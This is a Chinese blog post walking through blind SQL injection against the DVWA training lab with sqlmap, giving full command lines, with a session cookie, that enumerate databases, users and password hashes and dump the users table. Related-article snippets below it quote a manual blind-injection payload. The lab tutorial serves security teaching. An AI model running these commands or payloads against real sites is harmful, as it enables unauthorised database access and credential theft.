用sqlmap实现dvwa中的盲注详解

最新推荐文章于 2024-05-03 15:00:01 发布
最新推荐文章于 2024-05-03 15:00:01 发布
阅读量2.8k 收藏 22
点赞数 2
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107850951
版权

用sqlmap实现dvwa中的盲注详解

一、 dvwa 低sql盲注
① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。
在这里插入图片描述
② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。
PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” –batch
在这里插入图片描述
在这里插入图片描述
③获得DBMS中所有的数据库名称
构造指令:
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –dbs
在这里插入图片描述
在这里插入图片描述
④获取Web应用当前连接的数据库
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-db
在这里插入图片描述
在这里插入图片描述
⑥ 列出数据库中的所有用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch –users
在这里插入图片描述
在这里插入图片描述
⑦ 获取Web应用当前所操作的用户
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --current-user
在这里插入图片描述
在这里插入图片描述
⑧ 列出可连接数据库的所有账户-对应的密码哈希
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch --passwords
在这里插入图片描述
在这里插入图片描述
⑨ 列出指定数据库中的所有数据表
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa –tables
在这里插入图片描述
⑩ 列出指定数据表中的所有字段(列)
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users --columns
在这里插入图片描述
⑪ 导出指定数据表中的列字段进行保存
sqlmap.py -u “http:// 192.168.1.103/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jmrh7e40u41fjch3g2ht57dv00” --batch -D dvwa -T users -C “user,password” –dump
在这里插入图片描述
二、 dvwa 中sql盲注
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三、 dvwa 高sql盲注
在这里插入图片描述
四、 dvwa impossible sql盲注
在这里插入图片描述
(dvwa用sqlmap盲注完毕!!!)
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DVWA】20. SQL Injection (Blind)SQL(全等级Sqlmap版)
Zichel77的博客
04-08 1413
,有两种主要类型,包括布尔和时间
针对dvwa的sql=》Sqlmap工具
wangc的博客
04-07 558
Sqlmap工具入:kali-sqlmap工具: (ps:其实这就是我的实验报告,哈哈哈) 进行low等级: 获取cookie:(火狐浏览器,或者其他各式浏览器都行) 进行sqlmap sqlmap –u “http://192.168.1.9/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=” security=low; PHPSESSID=kol19emhbh8t4otgmsq8akuuva” 当前使用的数
SQL入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2298
数据库--数据表---字段---字段内容一站式识别
Sqlmap
mumuzi2的博客
02-25 386
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA——SQL入+
qq_58553228的博客
06-02 1151
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWA通过攻略之SQL
勿山几已
05-24 8324
简单介绍SQL入,演示手工进行SQL入及利用sqlmap进行自动化SQL
DVWA之sql入——
Williamanddog的博客
12-22 2993
DVWA
DVWA详解
qq_45788625的博客
04-18 6523
low等级DVWA详解
手把手带你利用SQLmap结合OOB技术实现音速.pdf
03-24
手把手带你利用SQLmap结合OOB技术实现音速 文档来自互联网收集,仅做学习使用,禁止进行违法活动。
Web应用手工渗透测试——用SQLMap进行SQL测试
02-26
本文主要关SQL入,假设读者已经了解一般的SQL入技术,在我之前的文章有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)入到数据库。本文将更进一步,讨论SQL...
sqlmap在windows上执行sql入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
SQLMAP2018版本详解
05-13
sqlmap命令详解,2018.5.13更新 sqlmap命令详解,2018.5.13更新 sqlmap命令详解,2018.5.13更新 sqlmap命令详解,2018.5.13更新 sqlmap命令详解,2018.5.13更新
DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE)
最新发布
05-30
WindowsDVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE),包含安装使用说明。 Windows部署DVWADVWA、PHPStudy Windows使用SqlMapSqlMap、Python Windows使用BurpSuite...
DVWA——SQL(全等级)
@一只躺平的猪@的博客
07-13 5451
SQL与一般入的区别在于:一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错入,本章主要介绍布尔。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本)
weixin_45116657的博客
08-25 4447
目录: 一、SQL SQL与SQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQL:SQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA 之 SQL Injection Blind(SQL
RexHa的博客
10-04 2220
DVWA sql
DVWA------SQL Injection (Blind)(SQL
m0_65712192的博客
12-09 2691
DVWA------SQL Injection (Blind)(SQL
渗透测试-SQL入之sqlmap的使用方法及实战案例
lza20001103的博客
07-19 3715
渗透测试-SQL入之sqlmap的使用方法及实战案例
Dvwa之SQL全级别学习笔记
Mbys_Lettuce的博客
09-19 1286
入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
dvwa sql
10-09
Blind SQL入是一种攻击技术,它利用应用程序对数据库的查询结果进行布尔判断来推断出数据的信息。在DVWA(Damn Vulnerable Web Application)进行的过程也类似。下面是一个简单的示例: 假设我们有一个登录页面,我们可以通过输入用户名和密码来验证用户身份。在用户名字段,我们可以尝试输入一些恶意的代码来触发SQL入漏洞。例如,我们可以使用如下的输入进行测试: `admin' AND SUBSTRING(password, 1, 1) = 'a' --` 这个输入的目的是判断数据库的密码字段的第一个字符是否是 'a'。如果页面在进行查询时,没有正确地处理输入,那么它可能会返回一个成功的结果,表示我们的猜测是正确的。通过不断尝试不同的字符和位置,我们可以逐步推断出整个密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值